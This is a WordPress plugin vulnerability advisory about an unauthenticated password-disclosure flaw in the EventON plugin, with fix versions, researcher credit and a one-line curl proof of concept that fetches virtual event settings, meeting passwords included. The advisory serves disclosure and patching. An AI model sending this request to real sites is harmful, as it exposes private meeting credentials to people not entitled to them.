WordPress Plugin Vulnerabilities

EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Virtual Event Password Disclosure

Description

The plugins do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve the settings of arbitrary virtual events, including any meeting password set (for example for Zoom)

Proof of Concept

curl -X POST --data "eid=240" 'http://127.0.0.1/wp-admin/admin-ajax.php?action=eventon_config_virtual_event'

240 being the ID of a virtual event

Affects Plugins

Fixed in 4.5.5
Fixed in 2.2.8

References

Classification

Type
NO AUTHORISATION
CWE

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Submitter
Erwan LR (WPScan)
Verified
Yes

Timeline

Publicly Published
2024-01-10 (about 4 months ago)
Added
2024-01-10 (about 4 months ago)
Last Updated
2024-01-10 (about 4 months ago)

Other